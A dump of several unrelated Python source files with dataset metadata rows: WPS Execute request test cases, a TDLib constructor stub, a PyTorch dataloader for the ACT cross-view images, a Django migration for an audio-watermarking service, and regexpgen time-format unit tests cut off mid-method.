class WPS10ExecuteComplexDataXMLRawOutputTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.XMLNoValTestCase):
expectedContentType = "text/xml; charset=utf-8"
expectedContentDisposition = 'attachment; filename="test02_identity_complex.xml"'
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC02:identity:complex</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC02:input00</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="text/xml">
<test:testXML xmlns:test="http://xml.eox.at/test" />
</wps:ComplexData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="text/xml">
<ows:Identifier>TC02:output00</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
"""
return (params, "xml")
class WPS10ExecuteComplexDataTextRawOutputKVPTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.PlainTextTestCase):
expectedContentType = "text/plain; charset=utf-8"
expectedContentDisposition = 'attachment; filename="test02_identity_complex.txt"'
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC02:identity:complex&DataInputs=TC02:input00=P%C5%99%C3%ADli%C5%A1%20%C5%BElu%C5%A5ou%C4%8Dk%C3%BD%20k%C5%AF%C5%88%20%C3%BAp%C4%9Bl%20%C4%8F%C3%A1belsk%C3%A9%20%C3%B3dy.&RawDataOutput=TC02:output00"
return (params, "kvp")
class WPS10ExecuteComplexDataJSONRawOutputKVPTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.JSONTestCase):
expectedContentType = "application/json; charset=utf-8"
expectedContentDisposition = 'attachment; filename="test02_identity_complex.json"'
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC02:identity:complex&DataInputs=TC02:input00={%22text%22:%22P%C5%99%C3%ADli%C5%A1%20%C5%BElu%C5%A5ou%C4%8Dk%C3%BD%20k%C5%AF%C5%88%20%C3%BAp%C4%9Bl%20%C4%8F%C3%A1belsk%C3%A9%20%C3%B3dy.%22}@mimeType=application%2Fjson&ResponseDocument=TC02:output00@mimeType=application%2Fjson&RawDataOutput=TC02:output00@mimeType=application%2Fjson"
return (params, "kvp")
class WPS10ExecuteComplexDataXMLRawOutputKVPTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.XMLNoValTestCase):
expectedContentType = "text/xml; charset=utf-8"
expectedContentDisposition = 'attachment; filename="test02_identity_complex.xml"'
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC02:identity:complex&DataInputs=TC02:input00=%3Ctest%3AtestXML+xmlns%3Atest%3D%22http%3A%2F%2Fxml.eox.at%2Ftest%22%3EP%C5%99%C3%ADli%C5%A1%20%C5%BElu%C5%A5ou%C4%8Dk%C3%BD%20k%C5%AF%C5%88%20%C3%BAp%C4%9Bl%20%C4%8F%C3%A1belsk%C3%A9%20%C3%B3dy.%3C%2Ftest%3AtestXML%3E@mimeType=text%2Fxml&RawDataOutput=TC02:output00@mimeType=text%2Fxml"
return (params, "kvp")
#===============================================================================
# WCS 1.0 Execute - Complex Data Tests (binary payload)
#===============================================================================
class WPS10ExecuteComplexDataPNGBase64FileTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
    # WPS 1.0 Execute (XML request): TC03 image generator produces a PNG via
    # its "file" method; the output is requested base64-encoded inside the XML
    # Execute response document (lineage on, no stored response, no status).
    expectedContentType = XML_CONTENT_TYPE
    def getRequest(self):
        # XML-encoded Execute request; the payload below is sent verbatim.
        params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC03:image_generator:complex</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC03:method</ows:Identifier>
<wps:Data>
<wps:LiteralData>file</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>TC03:seed</ows:Identifier>
<wps:Data>
<wps:LiteralData>0</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:ResponseDocument lineage="true" storeExecuteResponse="false" status="false">
<wps:Output mimeType="image/png" encoding="base64">
<ows:Identifier>TC03:output00</ows:Identifier>
</wps:Output>
</wps:ResponseDocument>
</wps:ResponseForm>
</wps:Execute>
"""
        return (params, "xml")
class WPS10ExecuteComplexDataTIFBase64InMemTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.WPS10XMLComparison):
    # WPS 1.0 Execute (XML request): TC03 image generator writes a TIFF into an
    # in-memory buffer; output requested base64-encoded in the XML response.
    expectedContentType = XML_CONTENT_TYPE
    def getRequest(self):
        # XML-encoded Execute request; the payload below is sent verbatim.
        params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC03:image_generator:complex</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC03:method</ows:Identifier>
<wps:Data>
<wps:LiteralData>in-memory-buffer</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>TC03:seed</ows:Identifier>
<wps:Data>
<wps:LiteralData>0</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:ResponseDocument lineage="true" storeExecuteResponse="false" status="false">
<wps:Output mimeType="image/tiff" encoding="base64">
<ows:Identifier>TC03:output00</ows:Identifier>
</wps:Output>
</wps:ResponseDocument>
</wps:ResponseForm>
</wps:Execute>
"""
        return (params, "xml")
class WPS10ExecuteComplexDataPNGBase64InMemKVPTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
    """WPS 1.0 Execute (KVP): base64-encoded PNG embedded in the XML Execute
    response document (in-memory-buffer method, lineage enabled).
    """
    expectedContentType = XML_CONTENT_TYPE

    def getRequest(self):
        # KVP equivalent of the XML in-memory PNG request above.
        query = "service=WPS&version=1.0.0&request=Execute&identifier=TC03:image_generator:complex&DataInputs=TC03:method=in-memory-buffer;TC03:seed=0&ResponseDocument=TC03:output00@mimeType=image%2Fpng@encoding=base64&lineage=true"
        return (query, "kvp")
class WPS10ExecuteComplexDataJPGBase64KVPTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.WPS10XMLComparison):
    # WPS 1.0 Execute (KVP): base64-encoded JPEG in the XML response document;
    # TC03:method is left at its default (only the seed is supplied).
    expectedContentType = XML_CONTENT_TYPE
    def getRequest(self):
        params = "service=WPS&version=1.0.0&request=Execute&identifier=TC03:image_generator:complex&DataInputs=TC03:seed=0&ResponseDocument=TC03:output00@mimeType=image%2Fjpeg@encoding=base64&lineage=true"
        return (params, "kvp")
class WPS10ExecuteComplexDataPNGRawOutputKVPTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.GDALDatasetTestCase):
    """WPS 1.0 Execute (KVP): raw PNG output of the TC03 image generator,
    validated as a GDAL dataset; response headers are checked by the mix-ins.
    """
    expectedContentType = "image/png"
    expectedContentDisposition = 'attachment; filename="test03_binary_complex.png"'

    def getFileExtension(self, file_type):
        # Every stored output for this case uses the PNG extension.
        return "png"

    def getRequest(self):
        query = "service=WPS&version=1.0.0&request=Execute&identifier=TC03:image_generator:complex&DataInputs=TC03:seed=0&RawDataOutput=TC03:output00"
        return (query, "kvp")
class WPS10ExecuteComplexDataTIFRawOutputKVPTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.WPS10BinaryComparison):
    # WPS 1.0 Execute (KVP): raw TIFF output compared byte-wise against the
    # stored reference; mix-ins check the response headers.
    expectedContentType = "image/tiff"
    expectedContentDisposition = 'attachment; filename="test03_binary_complex.tif"'
    def getFileExtension(self, file_type):
        # Extension used for the stored output/reference files.
        return "tif"
    def getRequest(self):
        params = "service=WPS&version=1.0.0&request=Execute&identifier=TC03:image_generator:complex&DataInputs=TC03:seed=0&RawDataOutput=TC03:output00@mimeType=image%2Ftiff"
        return (params, "kvp")
class WPS10ExecuteComplexDataJPGRawOutputTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.WPS10BinaryComparison):
    # WPS 1.0 Execute (XML request): raw JPEG output via wps:RawDataOutput,
    # compared byte-wise against the stored reference.
    expectedContentType = "image/jpeg"
    expectedContentDisposition = 'attachment; filename="test03_binary_complex.jpg"'
    def getFileExtension(self, file_type):
        # Extension used for the stored output/reference files.
        return "jpg"
    def getRequest(self):
        # XML-encoded Execute request; the payload below is sent verbatim.
        params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC03:image_generator:complex</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC03:seed</ows:Identifier>
<wps:Data>
<wps:LiteralData>0</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="image/jpeg">
<ows:Identifier>TC03:output00</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
"""
        return (params, "xml")
#===============================================================================
# response parameter input test
#===============================================================================
class WPS10ResponseParameterProcessDescriptionTestCase(ContentTypeCheckMixIn, testbase.XMLTestCase):
    """WPS 1.0 DescribeProcess (KVP) for the TC07:request-parameter process."""
    expectedContentType = XML_CONTENT_TYPE

    def getRequest(self):
        query = "service=WPS&version=1.0.0&request=DescribeProcess&identifier=TC07:request-parameter"
        return (query, "kvp")
class WPS10ResponseParameterExecuteTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
    # WPS 1.0 Execute (KVP) of TC07:request-parameter. Unlike the other cases
    # this returns a 3-tuple: the third element carries extra HTTP headers so
    # the process can read the request parameters back.
    expectedContentType = XML_CONTENT_TYPE
    def getRequest(self):
        params = "service=WPS&version=1.0.0&request=Execute&identifier=TC07:request-parameter&lineage=true"
        # (query, encoding, extra HTTP request headers)
        return (params, "kvp", {"X-Test-Header": "Test-Header-Value"})
| 47.682652
| 421
| 0.640548
| 3,437
| 33,807
| 6.271749
| 0.11318
| 0.057896
| 0.008072
| 0.046947
| 0.76851
| 0.746799
| 0.710614
| 0.701011
| 0.690666
| 0.682362
| 0
| 0.043678
| 0.194102
| 33,807
| 708
| 422
| 47.75
| 0.747513
| 0.109681
| 0
| 0.772569
| 0
| 0.048611
| 0.632147
| 0.298691
| 0
| 0
| 0
| 0.001412
| 0
| 1
| 0.083333
| false
| 0.001736
| 0.003472
| 0.005208
| 0.340278
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fa2afc139514d9b908c604f00ba6361761f0ae14
| 87
|
py
|
Python
|
py_tdlib/constructors/user_privacy_setting_rule_restrict_contacts.py
|
Mr-TelegramBot/python-tdlib
|
2e2d21a742ebcd439971a32357f2d0abd0ce61eb
|
[
"MIT"
] | 24
|
2018-10-05T13:04:30.000Z
|
2020-05-12T08:45:34.000Z
|
py_tdlib/constructors/user_privacy_setting_rule_restrict_contacts.py
|
MrMahdi313/python-tdlib
|
2e2d21a742ebcd439971a32357f2d0abd0ce61eb
|
[
"MIT"
] | 3
|
2019-06-26T07:20:20.000Z
|
2021-05-24T13:06:56.000Z
|
py_tdlib/constructors/user_privacy_setting_rule_restrict_contacts.py
|
MrMahdi313/python-tdlib
|
2e2d21a742ebcd439971a32357f2d0abd0ce61eb
|
[
"MIT"
] | 5
|
2018-10-05T14:29:28.000Z
|
2020-08-11T15:04:10.000Z
|
from ..factory import Type
class userPrivacySettingRuleRestrictContacts(Type):
    # TDLib constructor marker: a privacy rule that restricts the setting for
    # the user's contacts. Carries no fields; behavior comes from `Type`.
    pass
| 14.5
| 51
| 0.827586
| 8
| 87
| 9
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114943
| 87
| 5
| 52
| 17.4
| 0.935065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
d704149824ac4fcbd42f83398eb9ac2df0e279bb
| 29
|
py
|
Python
|
pysal/contrib/geotable/ops/__init__.py
|
cubensys/pysal
|
8d50990f6e6603ba79ae1a887a20a1e3a0734e51
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
pysal/contrib/geotable/ops/__init__.py
|
cubensys/pysal
|
8d50990f6e6603ba79ae1a887a20a1e3a0734e51
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
pysal/contrib/geotable/ops/__init__.py
|
cubensys/pysal
|
8d50990f6e6603ba79ae1a887a20a1e3a0734e51
|
[
"MIT",
"BSD-3-Clause"
] | 1
|
2021-07-19T01:46:17.000Z
|
2021-07-19T01:46:17.000Z
|
import atomic
import tabular
| 9.666667
| 14
| 0.862069
| 4
| 29
| 6.25
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 2
| 15
| 14.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d715a0f3e8d6d6fdb25ba0317b3e52a7c69d8d85
| 4,969
|
py
|
Python
|
utils/dataloader_act.py
|
yanghongji2007/cross_view_localization_EtoTR
|
5b9e89027c69a5071955450ca3e5b10315393120
|
[
"MIT"
] | 16
|
2021-11-19T03:06:52.000Z
|
2022-03-16T13:32:59.000Z
|
utils/dataloader_act.py
|
yanghongji2007/cross_view_localization_EtoTR
|
5b9e89027c69a5071955450ca3e5b10315393120
|
[
"MIT"
] | 3
|
2021-12-07T06:49:13.000Z
|
2022-01-01T07:56:45.000Z
|
utils/dataloader_act.py
|
yanghongji2007/cross_view_localization_L2LTR
|
5b9e89027c69a5071955450ca3e5b10315393120
|
[
"MIT"
] | null | null | null |
import os
from torch.utils.data import DataLoader
from torchvision.transforms import transforms
from PIL import Image
import scipy.io as sio
import torchvision
import argparse
__all__ = ['TrainDataloader','TestDataloader']
class TrainDataloader(DataLoader):
    """Training split of the ACT cross-view dataset.

    Reads './ACT_data.mat', builds (ground-view, satellite-view) image-path
    pairs, and keeps only the indices listed in anuData['trainSet'].
    NOTE(review): subclasses DataLoader but is used like a Dataset
    (__getitem__/__len__) — confirm against the training script.
    """
    def __init__(self, args):
        # args.polar selects polar-transformed satellite maps (PNG) over the
        # plain satellite images (JPG).
        self.polar = args.polar
        self.img_root = args.dataset_dir
        # Main transform; assumes args.img_size is (height, width) — TODO confirm.
        self.transform = transforms.Compose(
            [transforms.Resize((args.img_size[0], args.img_size[1])),
            transforms.ToTensor(),
            transforms.Normalize(mean = (0.485, 0.456, 0.406), std = (0.229, 0.224, 0.225))] )
        # Fixed 256x256 transform used for non-polar satellite images.
        self.transform_1 = transforms.Compose(
            [transforms.Resize((256, 256)),
            transforms.ToTensor(),
            transforms.Normalize(mean = (0.485, 0.456, 0.406), std = (0.229, 0.224, 0.225))] )
        self.allDataList = './ACT_data.mat'
        __cur_allid = 0  # for training (unused local, kept as-is)
        id_alllist = []
        id_idx_alllist = []
        # load the mat
        anuData = sio.loadmat(self.allDataList)
        idx = 0
        # Build one (ground, satellite) path pair per panorama id.
        for i in range(0,len(anuData['panoIds'])):
            if self.polar:
                grd_id_align = self.img_root + 'streetview/' + anuData['panoIds'][i] + '_grdView.png'
                sat_id_ori = self.img_root + 'polarmap/' + anuData['panoIds'][i] + '_satView_polish.png'
            else:
                grd_id_align = self.img_root + 'streetview/' + anuData['panoIds'][i] + '_grdView.jpg'
                sat_id_ori = self.img_root + 'satview_polish/' + anuData['panoIds'][i] + '_satView_polish.jpg'
            id_alllist.append([ grd_id_align, sat_id_ori])
            id_idx_alllist.append(idx)
            idx += 1
        all_data_size = len(id_alllist)
        print('InputData::__init__: load', self.allDataList, ' data_size =', all_data_size)
        # MATLAB indices are 1-based; shift to 0-based.
        training_inds = anuData['trainSet']['trainInd'][0][0] - 1
        trainNum = len(training_inds)
        print('trainSet:' ,trainNum)
        self.trainList = []
        self.trainIdList = []
        for k in range(trainNum):
            self.trainList.append(id_alllist[training_inds[k][0]])
            self.trainIdList.append(k)
    def __getitem__(self, idx):
        # Returns (ground tensor, satellite tensor) for the idx-th pair.
        x = Image.open(self.trainList[idx][0]).convert('RGB')
        x = self.transform(x)
        y = Image.open(self.trainList[idx][1]).convert('RGB')
        if self.polar:
            y = self.transform(y)
        else:
            # Non-polar satellite images use the fixed 256x256 transform.
            y = self.transform_1(y)
        return x, y
    def __len__(self):
        return len(self.trainList)
class TestDataloader(DataLoader):
    """Validation split of the ACT cross-view dataset.

    Mirrors TrainDataloader but selects anuData['valSet'] indices.
    NOTE(review): large duplication with TrainDataloader — a shared base
    could factor out the path-building loop; left unchanged here.
    """
    def __init__(self, args):
        self.polar = args.polar
        self.img_root = args.dataset_dir
        # Main transform; assumes args.img_size is (height, width) — TODO confirm.
        self.transform = transforms.Compose(
            [transforms.Resize((args.img_size[0], args.img_size[1])),
            transforms.ToTensor(),
            transforms.Normalize(mean = (0.485, 0.456, 0.406), std = (0.229, 0.224, 0.225)) ] )
        # Fixed 256x256 transform used for non-polar satellite images.
        self.transform_1 = transforms.Compose(
            [transforms.Resize((256, 256)),
            transforms.ToTensor(),
            transforms.Normalize(mean = (0.485, 0.456, 0.406), std = (0.229, 0.224, 0.225))] )
        self.allDataList = './ACT_data.mat'
        __cur_allid = 0  # for training (unused local, kept as-is)
        id_alllist = []
        id_idx_alllist = []
        # load the mat
        anuData = sio.loadmat(self.allDataList)
        idx = 0
        for i in range(0,len(anuData['panoIds'])):
            if self.polar:
                # polar transform and crop the ground view
                grd_id_align = self.img_root + 'streetview/' + anuData['panoIds'][i] + '_grdView.png'
                sat_id_ori = self.img_root + 'polarmap/' + anuData['panoIds'][i] + '_satView_polish.png'
            else:
                grd_id_align = self.img_root + 'streetview/' + anuData['panoIds'][i] + '_grdView.jpg'
                sat_id_ori = self.img_root + 'satview_polish/' + anuData['panoIds'][i] + '_satView_polish.jpg'
            id_alllist.append([ grd_id_align, sat_id_ori])
            id_idx_alllist.append(idx)
            idx += 1
        all_data_size = len(id_alllist)
        print('InputData::__init__: load', self.allDataList, ' data_size =', all_data_size)
        # MATLAB indices are 1-based; shift to 0-based.
        self.val_inds = anuData['valSet']['valInd'][0][0] - 1
        self.valNum = len(self.val_inds)
        print('valSet:' ,self.valNum)
        self.valList = []
        for k in range(self.valNum):
            self.valList.append(id_alllist[self.val_inds[k][0]])
        self.__cur_test_id = 0
    def __getitem__(self, idx):
        # Returns (ground tensor, satellite tensor) for the idx-th pair.
        x = Image.open(self.valList[idx][0]).convert('RGB')
        x = self.transform(x)
        y = Image.open(self.valList[idx][1]).convert('RGB')
        if self.polar:
            y = self.transform(y)
        else:
            y = self.transform_1(y)
        return x, y
    def __len__(self):
        return len(self.valList)
| 31.649682
| 110
| 0.570135
| 607
| 4,969
| 4.439868
| 0.172982
| 0.025974
| 0.040816
| 0.04898
| 0.767347
| 0.755473
| 0.755473
| 0.755473
| 0.732468
| 0.732468
| 0
| 0.039121
| 0.29523
| 4,969
| 156
| 111
| 31.852564
| 0.73044
| 0.018515
| 0
| 0.704762
| 0
| 0
| 0.097145
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057143
| false
| 0
| 0.066667
| 0.019048
| 0.180952
| 0.038095
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d7565b64deda72875dd6f9788b3804d9731b9b22
| 2,453
|
py
|
Python
|
web_services/migrations/0001_initial.py
|
berv-uni-project/audio-watermarik-web-services
|
0eb445b4fbd35ee564b910f90419c67cc8380604
|
[
"MIT"
] | 1
|
2021-12-13T01:32:02.000Z
|
2021-12-13T01:32:02.000Z
|
web_services/migrations/0001_initial.py
|
berv-uni-project/audio-watermarik-web-services
|
0eb445b4fbd35ee564b910f90419c67cc8380604
|
[
"MIT"
] | 4
|
2021-12-13T23:14:27.000Z
|
2022-01-11T11:40:04.000Z
|
web_services/migrations/0001_initial.py
|
berv-uni-project/audio-watermark-web-services
|
997fac664e1838210eaad64fe8951bb458fdfb63
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.4 on 2018-04-15 09:17
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the Embed and Extract watermarking-job tables.

    Auto-generated by Django (see the header comment above); both models track
    job status, the chosen method, inputs, and nullable outputs/results.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Embed',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('status', models.CharField(choices=[('pending', 'pending'), ('started', 'started'), ('finished', 'finished'), ('failed', 'failed')], default='pending', max_length=20)),
                ('method_option', models.CharField(choices=[('embed_1', 'DWT Based and Arnold Transform to Image')], default='0', max_length=100)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('image_input', models.TextField(default='')),
                ('audio_input', models.TextField(default='')),
                ('key', models.TextField(default='')),
                ('accessToken', models.TextField(default='')),
                ('audio_output', models.TextField(null=True)),
                ('result', models.TextField(null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Extract',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('status', models.CharField(choices=[('pending', 'pending'), ('started', 'started'), ('finished', 'finished'), ('failed', 'failed')], default='pending', max_length=20)),
                ('method_option', models.CharField(choices=[('extract_1', 'DWT Based and Arnold Transform to Image')], default='0', max_length=100)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('watermarked_audio_input', models.TextField(default='')),
                ('original_audio_input', models.TextField(default='')),
                ('size', models.TextField(default='')),
                ('key', models.TextField(default='')),
                ('accessToken', models.TextField(default='')),
                ('image_output', models.TextField(null=True)),
                ('result', models.TextField(null=True)),
            ],
        ),
    ]
| 51.104167
| 186
| 0.558092
| 230
| 2,453
| 5.813043
| 0.321739
| 0.145849
| 0.148093
| 0.074794
| 0.795812
| 0.740464
| 0.740464
| 0.740464
| 0.740464
| 0.740464
| 0
| 0.016256
| 0.272727
| 2,453
| 47
| 187
| 52.191489
| 0.733184
| 0.018345
| 0
| 0.55
| 1
| 0
| 0.192031
| 0.00975
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d7691a30d20f63e3457086938b1969e9e8abb23d
| 39
|
py
|
Python
|
double3/double3sdk/dock_tracker/__init__.py
|
CLOMING/winter2021_double
|
9b920baaeb3736a785a6505310b972c49b5b21e9
|
[
"Apache-2.0"
] | null | null | null |
double3/double3sdk/dock_tracker/__init__.py
|
CLOMING/winter2021_double
|
9b920baaeb3736a785a6505310b972c49b5b21e9
|
[
"Apache-2.0"
] | null | null | null |
double3/double3sdk/dock_tracker/__init__.py
|
CLOMING/winter2021_double
|
9b920baaeb3736a785a6505310b972c49b5b21e9
|
[
"Apache-2.0"
] | null | null | null |
from .dock_tracker import _DockTracker
| 19.5
| 38
| 0.871795
| 5
| 39
| 6.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 39
| 1
| 39
| 39
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d773f38087d3fec6466c3d419a69a594e4dad41c
| 9,929
|
py
|
Python
|
tests/Time.py
|
perfidia/regexpgen
|
a7139219b69127c488efffb588e7ef4177a8ec89
|
[
"MIT"
] | 2
|
2017-02-02T06:04:28.000Z
|
2019-04-23T07:14:58.000Z
|
tests/Time.py
|
perfidia/regexpgen
|
a7139219b69127c488efffb588e7ef4177a8ec89
|
[
"MIT"
] | null | null | null |
tests/Time.py
|
perfidia/regexpgen
|
a7139219b69127c488efffb588e7ef4177a8ec89
|
[
"MIT"
] | null | null | null |
'''
Created on Mar 16, 2012
@authors: Joanna Binczewska, Dawid Kowalski
'''
import unittest
import regexpgen
import re
import itertools
class Test(unittest.TestCase):
    """Tests for regexpgen.time(): regexes matching times in strftime-like
    formats, optionally bounded by min/max values.
    """
    def testDefault(self):
        # %H, %M, %S alone and common combined formats with no min/max bounds.
        regexp = regexpgen.time("%H")
        self.assertTrue(re.match(regexp, "01"))
        self.assertTrue(re.match(regexp, "10"))
        self.assertTrue(re.match(regexp, "00"))
        self.assertTrue(re.match(regexp, "23"))
        self.assertTrue(re.match(regexp, "17"))
        self.assertFalse(re.match(regexp, "1"))
        self.assertFalse(re.match(regexp, "33"))
        self.assertFalse(re.match(regexp, "24"))
        self.assertFalse(re.match(regexp, "99"))
        self.assertFalse(re.match(regexp, "-17"))
        # %M and %S share the same 00-59 range.
        for format in ["%M", "%S"]:
            regexp = regexpgen.time(format)
            self.assertTrue(re.match(regexp, "01"))
            self.assertTrue(re.match(regexp, "46"))
            self.assertTrue(re.match(regexp, "00"))
            self.assertTrue(re.match(regexp, "23"))
            self.assertTrue(re.match(regexp, "59"))
            self.assertFalse(re.match(regexp, "1"))
            self.assertFalse(re.match(regexp, "333"))
            self.assertFalse(re.match(regexp, "99"))
            self.assertFalse(re.match(regexp, "-17"))
        regexp = regexpgen.time("%H:%M")
        self.assertTrue(re.match(regexp, "01:00"))
        self.assertTrue(re.match(regexp, "00:00"))
        self.assertTrue(re.match(regexp, "00:05"))
        self.assertTrue(re.match(regexp, "23:59"))
        self.assertTrue(re.match(regexp, "17:34"))
        self.assertFalse(re.match(regexp, "1:12"))
        self.assertFalse(re.match(regexp, "33:12"))
        self.assertFalse(re.match(regexp, "23:67"))
        self.assertFalse(re.match(regexp, "99:00"))
        self.assertFalse(re.match(regexp, "-17:11"))
        # 12-hour clock with lowercase am/pm marker.
        regexp = regexpgen.time("%I:%M %p")
        self.assertTrue(re.match(regexp, "01:00 am"))
        self.assertTrue(re.match(regexp, "01:00 pm"))
        self.assertTrue(re.match(regexp, "09:45 pm"))
        self.assertTrue(re.match(regexp, "11:59 pm"))
        self.assertTrue(re.match(regexp, "00:00 am"))
        self.assertFalse(re.match(regexp, "1:00 am"))
        self.assertFalse(re.match(regexp, "01:0 am"))
        self.assertFalse(re.match(regexp, "12:00 am"))
        regexp = regexpgen.time("%I:%M:%S %p")
        self.assertTrue(re.match(regexp, "01:00:00 am"))
        self.assertTrue(re.match(regexp, "01:00:20 pm"))
        self.assertTrue(re.match(regexp, "09:45:59 pm"))
        self.assertTrue(re.match(regexp, "11:59:59 pm"))
        self.assertTrue(re.match(regexp, "00:00:00 am"))
        self.assertFalse(re.match(regexp, "1:00:00 am"))
        self.assertFalse(re.match(regexp, "01:0:00 am"))
        self.assertFalse(re.match(regexp, "12:00:00 am"))
    def testForWrongFormat(self):
        # Invalid or inconsistent format strings must raise ValueError.
        self.assertRaises(ValueError, regexpgen.time, "%wwI:%M %P")
        self.assertRaises(ValueError,regexpgen.time, "%I:%I")
        self.assertRaises(ValueError,regexpgen.time, "%I:%M")
        self.assertRaises(ValueError,regexpgen.time, "%I:%H")
        self.assertRaises(ValueError,regexpgen.time, "%H:%S")
        self.assertRaises(ValueError,regexpgen.time, "%P")
    def testForWrongInput(self):
        # Min/max values that don't fit the format, or min > max, must raise.
